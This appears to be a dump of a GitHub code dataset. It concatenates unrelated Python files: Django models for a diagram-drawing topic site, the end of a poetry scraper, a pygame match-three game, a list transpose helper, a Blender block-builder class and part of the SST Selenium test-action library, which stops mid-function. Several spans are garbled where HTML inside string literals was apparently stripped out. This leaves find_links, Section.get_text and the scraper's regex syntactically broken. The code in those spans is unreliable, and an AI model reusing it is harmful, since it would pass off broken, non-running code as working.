(offsetX,offsetY)\n \n current_width = max([i.pos[0]+text_size for i in icons]) + offset[0]\n current_height = max([i.pos[1]+text_size for i in icons]) + offset[1]\n \n factor = min((width-2*margin)/current_width,\n (height-2*margin)/current_height)\n offset=[i+margin/factor for i in offset]\n \n vects= [np.array([p[1].pos[0]-p[0].pos[0],p[1].pos[1]-p[0].pos[1]]) \n for p in pairs]\n lengths = [np.sqrt(np.dot(v,v)) for v in vects]\n start_end = [(p[0].size/le,(le-p[1].size)/le) for p,le in zip(pairs,lengths)]\n pos = [[p[0].pos[i%2]+se[i//2]*v[i%2] for i in range(4)] for p,se,v in zip(pairs,start_end,vects)]\n colors = [p[0].color for p in pairs]\n \n arrows = [ArrowObj(*i) for i in zip(pos,colors)]\n \n [i.norm(offset,factor) for i in icons]\n [i.norm(offset,factor) for i in arrows]\n \n self.name=name\n self.width = int(width)\n self.height = int(height)\n self.line_width = int(line_width)\n self.icons = icons\n self.arrows = arrows\n self.lines = [i for i in arrows]\n self.text_size = int(factor*text_size)\n \n self.offset=offset\n self.factor=factor\n \n def add_arrows(self,arrows,lines):\n arrows=[ArrowObj(*i) for i in arrows]\n lines = [ArrowObj(*i) for i in lines]\n [i.norm(self.offset,self.factor) for i in arrows]\n [i.norm(self.offset,self.factor) for i in lines]\n self.arrows.extend(arrows)\n self.lines.extend(lines)\n \nclass Dummy(object):\n def __init__(self,dict):\n self.__dict__.update(dict)\n\ndef find_links(s):\n offset=0\n a=re.findall(\"http[^ ]*\",s)\n b=re.split(\"http[^ ]*\",s)\n c=[]\n for i,j in zip(a,b[:-1]):\n if re.search(\"\"\"%s\"%(i,i))\n else:\n c.append(i)\n res=b[0]\n for i,j in zip(c,b[1:]):\n res+=i+j\n return res\n \nPOSITIONS = (\n (\"L\",\"Left\"),\n (\"R\",\"Right\"),\n (\"LT\",\"Left Top\"),\n (\"RT\",\"Right Top\"),\n (\"LB\",\"Left Bottom\"),\n (\"RB\",\"Right Bottom\"),\n (\"BR\",\"Bottom Right\"),\n (\"BL\",\"Bottom Left\"),\n (\"BC\",\"Bottom Center\")\n)\n \n#################\n\n\n### Picture storage ###\n\nclass PictureDim(models.Model):\n '''Specifies dimensions of an image'''\n # height and width\n height= models.IntegerField(default=0, blank=True)\n width= models.IntegerField(default=0, blank=True)\n \n # rectangle to crop an image\n left= models.IntegerField(default=0, blank=True)\n right= models.IntegerField(default=0, blank=True)\n top= models.IntegerField(default=0, blank=True)\n bottom= models.IntegerField(default=0, blank=True)\n\n \nclass Picture(models.Model):\n title = models.CharField(max_length=400, blank=True)\n source = models.CharField(max_length=300, blank=True)\n picture = models.ImageField(upload_to = \"ecosyn/pictures/\",\n null = True, blank=True)\n link = models.CharField(max_length=400, blank=True)\n dims = models.ForeignKey(PictureDim, on_delete= models.SET_NULL, \n null=True, blank=True)\n def __str__(self):\n return self.title\n \n def resize(self,width=None,height=None):\n pic=self.picture\n size_pic=np.array([pic.width,pic.height])\n d=self.dims\n if d is not None:\n width = width if width is not None else d.width\n height = height if height is not None else d.height\n if width==0:\n width=pic.width\n if height==0:\n height=pic.height\n size_crop=size_pic-np.array([d.left+d.right, d.top+d.bottom])\n if min(size_crop)<=0:\n size_crop=size_pic\n margins=[d.top,0,0,d.left]\n else:\n width = width if width is not None else size_pic[0]\n height = height if height is not None else size_pic[1]\n size_crop=size_pic\n margins=[0]*4\n\n factor = min(np.array([width,height])/size_crop)\n size_pic=[int(i*factor) for i in size_pic]\n size_crop=[int(i*factor) for i in size_crop]\n margins=[int(-i*factor) for i in margins]\n margins=\"%dpx %dpx %dpx %dpx\"%tuple(margins)\n print(size_pic,size_crop,margins)\n return (size_pic,size_crop,margins)\n \n \nclass Icon(models.Model):\n title = models.CharField(max_length=100, blank=True)\n source = models.CharField(max_length=200, blank=True)\n picture = models.ImageField(upload_to = \"ecosyn/icons/\",\n null = True, blank=True)\n def __str__(self):\n return self.title\n\n\n### Main classes ###\n \n \nclass SujetOrSecteur(models.Model):\n \"\"\" Abstract Class for storing topics or reports (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n caused_by : topics causing the present issue\n consequence : topics caused by the present issue\n \"\"\"\n \n name = models.CharField(max_length = 100)\n title = models.CharField(max_length=200)\n short_description = models.CharField(max_length=400, blank=True)\n date_created = models.DateField(auto_now_add = True)\n \n header_picture = models.ForeignKey(Picture, null = True, blank = True,\n on_delete = models.SET_NULL,\n related_name=\"+\")\n \n icon_picture = models.ForeignKey(Icon, null = True, blank = True,\n on_delete = models.SET_NULL,\n related_name=\"+\")\n \n def __str__(self):\n return self.name\n\n def get_sections(self):\n sec=self.section_set.order_by(\"order\").all()\n res=[]\n order=0\n temp=[]\n for i in sec:\n if i.order!=order:\n res.append(temp)\n temp=[i]\n order=i.order\n else:\n temp.append(i)\n res.append(temp)\n return res\n \n class Meta:\n abstract = True\n \n \nclass Secteur(SujetOrSecteur):\n \"\"\" Subclass of for storing reports (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n name : used internally\n title : Title displayed on the site\n short_description : displayed under the title\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n \"\"\"\n color = models.CharField(max_length = 50, default=\"grey\")\n order = models.IntegerField(default = 0) \n \n \nclass Sujet(SujetOrSecteur):\n \"\"\" Class for storing topics (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n causes : topics causing the present issue\n consequences : topics caused by the present issue\n \"\"\"\n \n secteur = models.ForeignKey(Secteur, null = True, blank=True,\n on_delete = models.SET_NULL)\n\n \n def __str__(self):\n return self.name\n \n def get_cause_diagram(self, width=500, height = 500):\n \"\"\" Prepare the diagram of issues that cause the present ones\n \n pics : icon of the causes\n colors : the corresponding Sector color\n text : a short description of the cause\n pos : position of the cause image\n sizes : size of the cause image\n \n \"\"\"\n size_center= 7\n default_size = 3\n distance = 15\n line_width = 2\n margin = 5\n side_angle = 0.7\n \n causes = self.causes.all()\n lien_causes = [lien.cause for lien in causes]\n \n if len(causes)>0:\n # computing position and size of the graphic elements\n sizes= [lien.relative_share for lien in causes]\n sizes= [np.sqrt(i) if i is not None else default_size for i in sizes]\n sizes= [min(i,distance-size_center-2) for i in sizes]\n \n titles=[c.title for c in lien_causes]\n pics=[c.icon_picture for c in lien_causes]\n colors=[\"grey\" if c.secteur is None else \n c.secteur.color for c in lien_causes]\n text = [lien.cause_description for lien in causes]\n ids = [c.id for c in lien_causes]\n \n \n angle=[0]\n angle.extend([i+j for i,j in zip(sizes[:-1],sizes[1:])])\n angle=np.cumsum(angle)*(2*np.pi/(2*sum(sizes)))\n angle += np.pi - angle[-1]/2\n angle *= side_angle/2 \n angle += (1-side_angle)/2*np.pi + np.pi/2\n pos = [(distance*np.cos(i),distance*np.sin(i)) for i in angle]\n \n # storing as object list \n icons=[IconObj(*i) for i in \n zip(titles,text,pics,colors,pos,sizes,ids)]\n else:\n icons=[]\n \n try:\n color_center=self.secteur.color \n except AttributeError:\n color_center=\"grey\"\n center = IconObj(self.title,self.short_description,\n self.icon_picture,color_center,\n (0,0),size_center,self.id)\n \n\n con = self.consequences.all()\n \n if len(con)>0:\n # computing position and size of the graphic elements\n titles2 =[lien.consequence.title for lien in con]\n text2 = [lien.consequence_description for lien in con]\n pics2 =[lien.consequence.icon_picture for lien in con]\n colors2 =[\"grey\" if lien.consequence.secteur is None else \n lien.consequence.secteur.color for lien in con]\n ids2 = [lien.consequence.id for lien in con]\n\n angle2=np.linspace(0,2*np.pi,len(con),endpoint=False)\n angle2 += np.pi - angle2[-1]/2\n angle2 *= side_angle/2 \n angle2 += (1-side_angle)/2*np.pi - 1/2*np.pi\n pos2 = [(distance*np.cos(i),distance*np.sin(i)) for i in angle2]\n sizes2= [default_size]*len(con)\n \n # storing as object list \n icons2=[IconObj(*i) for i in \n zip(titles2,text2,pics2,colors2,pos2,sizes2,ids2)]\n else:\n icons2=[]\n \n pairs=[(i,center) for i in icons]\n pairs.extend([(center,i) for i in icons2])\n \n icons.extend(icons2)\n icons.append(center)\n \n if len(icons)==0:\n return False\n\n diag=DiagramObj(\"causes\",icons,pairs,margin,width,height,line_width,\n text_size_factor=2)\n self.cause_diagram = diag\n return True\n \n \nclass Page(SujetOrSecteur):\n \"\"\" Subclass of for storing page content \"\"\"\n pass\n\n \n### Serve content to the main classes ###\n\n \nclass Section(models.Model):\n \"\"\" Class to store a section of a webpage\n \n Attributes:\n title : subtitle of the section (optionnal)\n section_text : \n picture: contains a picture and some metadata\n order : order of the section in the topic page\n \"\"\"\n\n title = models.CharField(max_length=200, blank=True)\n subtitle = models.CharField(max_length=200, blank=True)\n text = models.TextField(default=\"\", blank=True)\n \n order = models.PositiveSmallIntegerField()\n opinion = models.BooleanField(blank=True, default = False)\n background = models.ForeignKey(Picture, on_delete = models.SET_NULL,\n null = True, blank=True)\n \n sujet = models.ForeignKey(Sujet, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n secteur = models.ForeignKey(Secteur, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n page = models.ForeignKey(Page, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n \n def __str__(self):\n s=\"\"\n if self.sujet is not None:\n s = \"Sujet: %s\"%(self.sujet.name)\n elif self.secteur is not None:\n s = \"Secteur: %s\"%(self.secteur.name)\n elif self.page is not None:\n s = \"Page: %s\"%(self.page.name)\n max_len=25\n s=\"%s (%d) %s\"%(s,self.order,self.title[:max_len])\n if len(self.title)>=max_len:\n s+=\"...\"\n return s\n \n def get_text(self):\n res=[]\n last=False\n text=self.text\n if text==\"\":\n return text\n text=find_links(self.text)\n for i in text.split('\\n'):\n boo=i[0]=='-'\n if boo:\n i = \"\\n
%s
\"%i[1:]\n else:\n i = \"\\n\" + i\n if not last and boo: \n i = \"\\n
\" + i[1:]\n elif last and not boo:\n i = \"\\n
\" + i\n last=boo\n \n res.append(i)\n if last:\n res.append(\"
\")\n res = \"\".join(res)\n res=res.replace(\"\\r\\n\",\"
',html,re.DOTALL)\n for poetry_html in match_poetry_list:\n poetry_lines_list = re.findall(r\"
(.*?)
\",poetry_html,re.DOTALL) \n poetry_text=\"\"\n for line in poetry_lines_list:\n if line.find(u\"作者\")>=0 or line.find(u\"分类\")>=0 or line.find(\"href\")>=0:\n continue\n if line.find(\"(\")>=0:\n line=re.sub(r'\\(.*?\\)','',line)\n if line.find(\"[\")>=0:\n line=re.sub(r'\\[.*?\\]','',line) \n poetry_text += line \n poetry.append(poetry_text) \n page += 1\n if html.find(u\"末页\")==-1:\n break \n poetryfile = codecs.open(ffile,encoding='utf-8',mode='w')\n poetryfile.write(u\"\\r\".join(poetry))\n poetryfile.close()\n\n","repo_name":"one-leaf/tensorflow","sub_path":"5_test/4_nlp_poetry/getshixue.py","file_name":"getshixue.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"}
+{"seq_id":"14315997699","text":"import pygame\nimport sys\nfrom pygame.locals import *\nimport random\nimport time\nimport datetime\nimport sqlite3\nimport math\nimport sys\n\n\npygame.init()\npygame.display.set_caption('Jewel quest')\nscreen = pygame.display.set_mode((400, 425),0,32)\n\nwidth = 400\nheight = 400\nscoreboard_height = 25\n\n\nstart_ticks=pygame.time.get_ticks() \n\nclock = pygame.time.Clock()\n\nfont = pygame.font.SysFont(None, 30)\ncandy_colors = ['blue', 'green', 'orange', 'pink', 'purple', 'red', 'teal', 'yellow'] \ncandy_width = 40\ncandy_height = 40\ncandy_size = (candy_width, candy_height)\n\ndef draw_text(text, font, color, surface, x, y):\n textobj = font.render(text, 1, color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n \n \ndef complete_level_screen():\n font = pygame.font.Font(None, 32)\n running = True\n while running:\n screen.fill((0, 255, 153))\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n draw_text('Level complete', font, (0,0,0), screen, 90, 200)\n \n pygame.display.update()\n\ndef help():\n running = True\n while running:\n screen.fill((255, 242, 145))\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n draw_text('Rules', font, (0,0,0), screen, 80, 40)\n draw_text('Classic match-tree rules', font, (0,0,0), screen, 80, 80)\n draw_text('Time: Play until time end', font, (0,0,0), screen, 80, 120)\n draw_text('Score *: 3 level with limit score', font, (0,0,0), screen, 80, 160)\n pygame.display.update() \n ","repo_name":"Kl1rik/PPOIS_Spring","sub_path":"Lab 3.8/HelpScreen.py","file_name":"HelpScreen.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"72407781511","text":"def transpose(array):\n array = array[:] # make copy to avoid changing original\n n = len(array)\n for i, row in enumerate(array):\n array[i] = row + [None for _ in range(n - len(row))]\n\n array = list(zip(*array))\n\n for i, row in enumerate(array):\n array[i] = [elem for elem in row if elem is not None]\n array_clear = []\n for line in array:\n if len(line) > 0:\n array_clear.append(line)\n\n return array_clear\n","repo_name":"AVVasiliev/graphics-visualizer","sub_path":"graphics_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"30539382315","text":"import bpy\nimport mathutils\n\nclass Block:\n \"\"\"A basic block with a single texture\n \n This class should be inherited by every other block class\n \"\"\"\n\n def __init__(self, id, unlocalizedName, textureName):\n self._id = id\n self._unlocalizedName = unlocalizedName\n self._textureName = textureName\n \n def getBlockTexturePath(self, textureName):\n return bpy.path.abspath(\"//textures/blocks/\" + textureName + \".png\")\n\n def make(self, x, y, z, metadata):\n obj = self.makeObject(x, y, z, metadata)\n self.makeUVMap(obj, metadata)\n self.applyMaterial(obj, metadata)\n \n def makeObject(self, x, y, z, metadata):\n mesh = bpy.data.meshes.new(name=\"Block\")\n mesh.from_pydata([[-0.5,-0.5,-0.5],[0.5,-0.5,-0.5],[-0.5,0.5,-0.5],[0.5,0.5,-0.5],[-0.5,-0.5,0.5],[0.5,-0.5,0.5],[-0.5,0.5,0.5],[0.5,0.5,0.5]],[],[[0,1,3,2],[4,5,7,6],[0,1,5,4],[0,2,6,4],[2,3,7,6],[1,3,7,5]])\n mesh.update()\n\n obj = bpy.data.objects.new(\"Block\", mesh)\n obj.location.x = x + 0.5\n obj.location.y = y + 0.5\n obj.location.z = z + 0.5\n obj.blockId = self._id\n obj.blockMetadata = metadata\n bpy.context.scene.objects.link(obj)\n\n activeObject = bpy.context.scene.objects.active\n bpy.context.scene.objects.active = obj\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.mesh.normals_make_consistent(inside=False)\n bpy.ops.object.editmode_toggle()\n bpy.context.scene.objects.active = activeObject\n \n return obj\n \n def makeUVMap(self, obj, metadata):\n obj.data.uv_textures.new();\n obj.data.uv_layers[0].data.foreach_set(\"uv\", [0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1])\n \n def applyMaterial(self, obj, metadata):\n try:\n mat = bpy.data.materials[self._unlocalizedName]\n except KeyError:\n mat = bpy.data.materials.new(self._unlocalizedName)\n mat.preview_render_type = \"CUBE\"\n mat.use_nodes = True\n mat.node_tree.nodes[\"Material Output\"].location = [300, 0]\n mat.node_tree.nodes[\"Diffuse BSDF\"].location = [100, 0]\n \n #Initialize Texture\n try:\n tex = bpy.data.images[self._unlocalizedName]\n except KeyError:\n tex = bpy.data.images.load(self.getBlockTexturePath(self._textureName))\n tex.name = self._unlocalizedName\n\n #First Image Texture\n mat.node_tree.nodes.new(type=\"ShaderNodeTexImage\")\n mat.node_tree.nodes[\"Image Texture\"].location = [-100, 75]\n mat.node_tree.nodes[\"Image Texture\"].image = tex\n mat.node_tree.nodes[\"Image Texture\"].interpolation = \"Closest\"\n mat.node_tree.nodes[\"Image Texture\"].projection = \"FLAT\"\n mat.node_tree.links.new(mat.node_tree.nodes[\"Image Texture\"].outputs[0], mat.node_tree.nodes[\"Diffuse BSDF\"].inputs[0])\n \n #UV Map\n mat.node_tree.nodes.new(type=\"ShaderNodeUVMap\")\n mat.node_tree.nodes[\"UV Map\"].location = [-300, 0]\n mat.node_tree.nodes[\"UV Map\"].uv_map = \"UVMap\"\n mat.node_tree.links.new(mat.node_tree.nodes[\"UV Map\"].outputs[0], mat.node_tree.nodes[\"Image Texture\"].inputs[0])\n \n obj.data.materials.append(mat)\n","repo_name":"scribblemaniac/MCEdit2Blender","sub_path":"blocks/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"}
+{"seq_id":"72013873031","text":"import codecs\nimport logging\nimport os\nimport re\nimport time\n\nfrom datetime import datetime\nfrom pdb import set_trace as debug\nfrom urlparse import urljoin, urlparse\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.common.exceptions import (\n InvalidElementStateException,\n NoSuchAttributeException,\n NoSuchElementException,\n NoSuchFrameException,\n NoSuchWindowException,\n StaleElementReferenceException,\n WebDriverException,\n)\n\nfrom sst import config\nfrom sst import bmobproxy\n\n\n__all__ = [\n 'accept_alert', 'add_cleanup', 'assert_attribute', 'assert_button',\n 'assert_checkbox', 'assert_checkbox_value', 'assert_css_property',\n 'assert_displayed', 'assert_dropdown', 'assert_dropdown_value',\n 'assert_element', 'assert_equal', 'assert_link', 'assert_not_equal',\n 'assert_radio', 'assert_radio_value', 'assert_table_has_rows',\n 'assert_table_headers', 'assert_table_row_contains_text',\n 'assert_text', 'assert_text_contains', 'assert_textfield',\n 'assert_title', 'assert_title_contains', 'assert_url',\n 'assert_url_contains', 'check_flags', 'clear_cookies',\n 'click_button', 'click_element', 'click_link', 'close_window',\n 'debug', 'dismiss_alert', 'end_test', 'execute_script',\n 'exists_element', 'fails', 'get_argument', 'get_base_url',\n 'get_cookies', 'get_current_url', 'get_element',\n 'get_element_by_css', 'get_element_by_xpath', 'get_element_source',\n 'get_elements', 'get_elements_by_css', 'get_elements_by_xpath',\n 'get_link_url', 'get_page_source', 'get_wait_timeout', 'get_window_size',\n 'go_back', 'go_to', 'refresh', 'reset_base_url', 'retry_on_stale_element',\n 'run_test', 'save_page_source', 'set_base_url', 'set_checkbox_value',\n 'set_dropdown_value', 'set_radio_value', 'set_wait_timeout',\n 'set_window_size', 'simulate_keys', 'skip', 'sleep', 'start',\n 'stop', 'switch_to_frame', 'switch_to_window',\n 'take_screenshot', 'toggle_checkbox', 'wait_for',\n 'wait_for_and_refresh', 'write_textfield'\n]\n\n\nbrowser = None\nbrowsermob_proxy = None\n_check_flags = True\n_test = None\n\nBASE_URL = 'http://localhost:8000/'\n__DEFAULT_BASE_URL__ = BASE_URL\n\nlogger = logging.getLogger('SST')\n\n\nclass EndTest(StandardError):\n pass\n\n\ndebug.__doc__ = \"\"\"Start the debugger, a shortcut for `pdb.set_trace()`.\"\"\"\n\n\nclass _Sentinel(object):\n def __repr__(self):\n return 'default'\n_sentinel = _Sentinel()\n\n\ndef _raise(msg):\n logger.debug(msg)\n raise AssertionError(msg)\n\n\ndef retry_on_stale_element(func):\n \"\"\"Decorate ``func`` so StaleElementReferenceException triggers a retry.\n\n ``func`` is retried only once.\n\n selenium sometimes raises StaleElementReferenceException which leads to\n spurious failures. In those cases, using this decorator will retry the\n function once and avoid the spurious failure. This is a work-around until\n selenium is properly fixed and should not be abused (or there is a\n significant risk to hide bugs in the user scripts).\n \"\"\"\n def wrapped(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except StaleElementReferenceException as e:\n logger.warning('Retrying after catching: %r' % e)\n return func(*args, **kwargs)\n return wrapped\n\n\ndef set_base_url(url):\n \"\"\"Set the url used for relative arguments to the `go_to` action.\"\"\"\n global BASE_URL\n if not url.startswith('http') and not url.startswith('file'):\n url = 'http://' + url\n logger.debug('Setting base url to: %r' % url)\n BASE_URL = url\n\n\ndef get_base_url():\n \"\"\"Return the base url used by `go_to`.\"\"\"\n return BASE_URL\n\n\ndef reset_base_url():\n \"\"\"\n Restore the base url to the default. This is called automatically for\n you when a test script completes.\"\"\"\n global BASE_URL\n BASE_URL = __DEFAULT_BASE_URL__\n\n\ndef end_test():\n \"\"\"\n If called it ends the test. Can be used conditionally to exit a\n test under certain conditions.\"\"\"\n raise EndTest\n\n\ndef skip(reason=''):\n \"\"\"\n Skip the test. Unlike `end_test` a skipped test will be reported\n as a skip rather than a pass.\"\"\"\n _test.skipTest(reason)\n\n\ndef start(browser_type=None, device='', version='',\n browser_platform='ANY', session_name='',\n javascript_disabled=False, assume_trusted_cert_issuer=False,\n webdriver_remote=None, additional_capabilities=None,\n webdriver_class=None, saucelabs_enabled=False, skip_tracking=False):\n \"\"\"\n Starts Browser with a new session. Called for you at\n the start of each test script.\"\"\"\n global browser\n global browsermob_proxy\n\n if browser_type is None:\n browser_type = config.browser_type\n\n if logger.isEnabledFor(logging.DEBUG):\n # XXX We print a new line because otherwise the first debug message\n # will be printed on the same line as the name of the test. This is\n # hacky and doesn't cover cases when the script logs things higher\n # than debug, but this way we are keeping the same behavior we had\n # before adding the log.\n print\n logger.debug('Starting browser: %s' % browser_type)\n\n if webdriver_remote is None:\n if browser_type == 'Firefox':\n # profile features are FF only\n profile = getattr(webdriver, '%sProfile' % browser_type)()\n profile.set_preference('intl.accept_languages', 'en')\n if config.browsermob_enabled:\n # proxy integration is currently FF only\n browsermob_proxy = bmobproxy.BrowserMobProxy(\n 'localhost', 8080)\n selenium_proxy = webdriver.Proxy(\n {'httpProxy': browsermob_proxy.url})\n profile.set_proxy(selenium_proxy)\n if assume_trusted_cert_issuer:\n profile.set_preference(\n 'webdriver_assume_untrusted_issuer', False)\n profile.set_preference(\n 'capability.policy.default.Window.QueryInterface',\n 'allAccess')\n profile.set_preference(\n 'capability.policy.default.Window.frameElement.get',\n 'allAccess')\n if javascript_disabled:\n profile.set_preference('javascript.enabled', False)\n browser = getattr(webdriver, browser_type)(profile)\n else:\n browser = getattr(webdriver, browser_type)()\n else:\n desired_capabilities = {\"browserName\": browser_type.lower(),\n \"platform\": browser_platform.upper(),\n \"version\": version,\n \"device\": device,\n \"javascriptEnabled\": not javascript_disabled,\n \"name\": session_name,\n \"build\": config.cmd_opts.env}\n if additional_capabilities:\n desired_capabilities.update(additional_capabilities)\n\n browser_class = webdriver_class if webdriver_class else webdriver.Remote\n browser = browser_class(desired_capabilities=desired_capabilities,\n command_executor=webdriver_remote)\n\n # FIXME: Not a good way to share the browser object.\n config.cache['browser'] = browser\n config.cache['browsermob_proxy'] = browsermob_proxy\n\n return browser, browsermob_proxy\n\n\ndef stop():\n \"\"\"\n Stops Firefox and ends the browser session. Called automatically for you at\n the end of each test script.\"\"\"\n global browser\n global browsermob_proxy\n\n logger.debug('Stopping browser')\n # quit calls close() and does cleanup\n browser.quit()\n browser = None\n\n if browsermob_proxy is not None:\n logger.debug('Closing http proxy')\n browsermob_proxy.close()\n browsermob_proxy = None\n\n\ndef refresh(wait=True):\n \"\"\"\n Refresh the current page.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Refreshing current page')\n browser.refresh()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef take_screenshot(filename='screenshot.png', add_timestamp=True):\n \"\"\"\n Take a screenshot of the browser window. Called automatically on failures\n when running in `-s` mode.\n\n Return the path to the saved screenshot.\"\"\"\n logger.debug('Capturing Screenshot')\n _make_results_dir()\n if add_timestamp:\n filename = _add_time_stamp(filename)\n screenshot_file = os.path.join(config.results_directory, filename)\n browser.get_screenshot_as_file(screenshot_file)\n return screenshot_file\n\n\ndef _add_time_stamp(filename):\n now = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n root, extension = os.path.splitext(filename)\n return '{0}-{1}{2}'.format(root, now, extension)\n\n\ndef save_page_source(filename='pagedump.html', add_timestamp=True):\n \"\"\"\n Save the source of the currently opened page.\n Called automatically on failures when running `-s` mode.\n\n Return the path to the saved file.\"\"\"\n logger.debug('Saving page source')\n _make_results_dir()\n if add_timestamp:\n filename = _add_time_stamp(filename)\n page_source_file = os.path.join(config.results_directory, filename)\n with codecs.open(page_source_file, 'w', encoding='utf-8') as f:\n f.write(get_page_source())\n return page_source_file\n\n\ndef _make_results_dir():\n \"\"\"\n Make results directory if it does not exist.\"\"\"\n try:\n os.makedirs(config.results_directory)\n except OSError:\n pass # already exists\n\n\ndef sleep(secs):\n \"\"\"\n Delay execution for a given number of seconds. The argument may be a\n floating point number for subsecond precision.\"\"\"\n logger.debug('Sleeping %s secs' % secs)\n time.sleep(secs)\n\n\ndef _fix_url(url):\n parsed = urlparse(url)\n if not parsed.scheme:\n url = urljoin(BASE_URL, url)\n return url\n\n\ndef _add_trailing_slash(url):\n if not url.endswith('/'):\n url += '/'\n return url\n\n\ndef get_argument(name, default=_sentinel):\n \"\"\"\n Get an argument from the one the test was called with.\n\n A test is called with arguments when it is executed by\n the `run_test`. You can optionally provide a default value\n that will be used if the argument is not set. If you don't\n provide a default value and the argument is missing an\n exception will be raised.\"\"\"\n args = config.__args__\n\n value = args.get(name, default)\n if value is _sentinel:\n raise LookupError(name)\n return value\n\n\ndef run_test(name, **kwargs):\n \"\"\"\n Execute a named test, with the specified arguments.\n\n Arguments can be retrieved by the test with `get_argument`.\n\n The `name` is the test file name without the '.py'.\n\n You can specify tests in an alternative directory with\n relative path syntax. e.g.::\n\n run_test('subdir/foo', spam='eggs')\n\n Tests can return a result by setting the name `RESULT`\n in the test.\n\n Tests are executed with the same browser (and browser\n session) as the test calling `test_run`. This includes\n whether or not Javascript is enabled.\n\n Before the test is called the timeout and base url are\n reset, but will be restored to their orginal value\n when `run_test` returns.\"\"\"\n # delayed import to workaround circular imports\n from sst import context\n logger.debug('Executing test: %s' % name)\n return context.run_test(name, kwargs)\n\n\ndef _make_useable_har_name(stem=''):\n now = datetime.now()\n timestamped_base = 'har-%s' % now.strftime('%Y-%m-%d_%H-%M-%S-%f')\n if stem:\n slug_name = ''.join(x for x in stem if x.isalnum())\n out_name = '%s-%s.har' % (timestamped_base, slug_name)\n else:\n out_name = '%s.har' % timestamped_base\n file_name = os.path.join(config.results_directory, out_name)\n return file_name\n\n\ndef go_to(url='', wait=True):\n \"\"\"\n Go to a specific URL. If the url provided is a relative url it will be\n added to the base url. You can change the base url for the test with\n `set_base_url`.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browser is None:\n start()\n\n url = _fix_url(url)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Going to... %s' % url)\n browser.get(url)\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name(url))\n\n\ndef go_back(wait=True):\n \"\"\"\n Go one step backward in the browser history.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Going back one step in browser history')\n browser.back()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef assert_checkbox(id_or_elem):\n \"\"\"\n Assert that the element is a checkbox.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a checkbox.\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, 'checkbox')\n return elem\n\n\ndef assert_checkbox_value(id_or_elem, value):\n \"\"\"\n Assert checkbox value. Takes an element id or object plus either True or\n False. Raises a failure exception if the element specified doesn't exist\n or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n real = checkbox.is_selected()\n msg = 'Checkbox: %r - Has Value: %r' % (_get_text(checkbox), real)\n if real != value:\n _raise(msg)\n\n\ndef toggle_checkbox(id_or_elem):\n \"\"\"\n Toggle the checkbox value. Takes an element id or object. Raises a failure\n exception if the element specified doesn't exist or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n logger.debug('Toggling checkbox: %r' % _get_text(checkbox))\n before = checkbox.is_selected()\n checkbox.click()\n after = checkbox.is_selected()\n msg = 'Checkbox: %r - was not toggled, value remains: %r' \\\n % (_get_text(checkbox), before)\n if before == after:\n _raise(msg)\n\n\ndef set_checkbox_value(id_or_elem, new_value):\n \"\"\"\n Set a checkbox to a specific value, either True or False. Raises a failure\n exception if the element specified doesn't exist or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n logger.debug(\n 'Setting checkbox %r to %r' % (_get_text(checkbox), new_value))\n # There is no method to 'unset' a checkbox in the browser object\n current_value = checkbox.is_selected()\n if new_value != current_value:\n 